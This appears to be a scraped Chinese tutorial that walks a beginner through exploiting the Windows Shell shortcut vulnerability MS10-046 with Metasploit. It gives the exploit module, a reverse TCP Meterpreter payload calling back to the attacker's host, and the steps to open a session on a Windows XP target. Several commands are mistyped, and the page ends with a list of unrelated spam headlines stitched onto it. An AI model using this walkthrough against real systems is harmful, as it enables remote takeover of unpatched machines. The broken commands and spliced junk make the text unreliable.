一、漏洞介绍
【黑客是如何利用MS10 黑客是如何利用漏洞的】这是Windows Shell中一个公开披露的漏洞 。如果显示特制快捷方式的图标 , 则该漏洞可能允许远程执行代码 。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限 。与使用管理用户权限进行操作的用户相比 , 将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小 。
二、资源装备
1.安装好Kali Linux的虚拟机一台;
2.Windows xp 计算机一台 。
3.整装待发的小白一个 。
三、攻防实战
2.1 在kali中启动MSF 。
打开终端 键入命令:msfconsole
文章插图
2.2 配置相关参数
①键入命令:search ms10-046
②复制msf返回的命令前加use:use exploit/windows/browser/ms10-046_shortcut_icon_dllloader
③设置payload: set paylodad windows/meterpreter/revers_tcp
④显示需要配置的参数 :show options
文章插图
⑤设置靶机(win xp)IP地址 set srvhosts 192.168.xxx.xxx
⑥设置本机(kali) IP地址 set lhost 192.168.xxx.xxx
⑦运行payload键入命令:exploit
文章插图
2.3 查看接收到的会话 , 并对靶机实行攻击
键入命令:session -l , 查看会话 。session -l x(x为会话id)连接会话 。
文章插图
- 梦见林间空地_周公解梦梦到林间空地是什么意思_做梦梦见林间空地好不好
- 【游戏迷】XYG绝境翻盘, 4-3WE锁定4强: 一样的巅峰阵容, 最尴尬的却是AG!
- 梦见老婆早产_周公解梦梦到老婆早产是什么意思_做梦梦见老婆早产好不好
- 【游戏世界】魔兽怀旧服: 支持取消随机本? 游戏快餐的开始? 遍地站桩不是快餐
- 你的婚姻是什婚 婚姻都是什么婚
- 窗帘店名字(图文)
- 智能手机信号不好 手机信号不好是手机的问题吗
- 【历史故事】假如给诸葛亮五万吨方便面,蜀汉是不是就能够统一三国了?
- 公司名称注册查询网(图文)
- 【爱历史】《山河月明》:抹黑忠臣铁铉,难道历史真是任人打扮的小丑?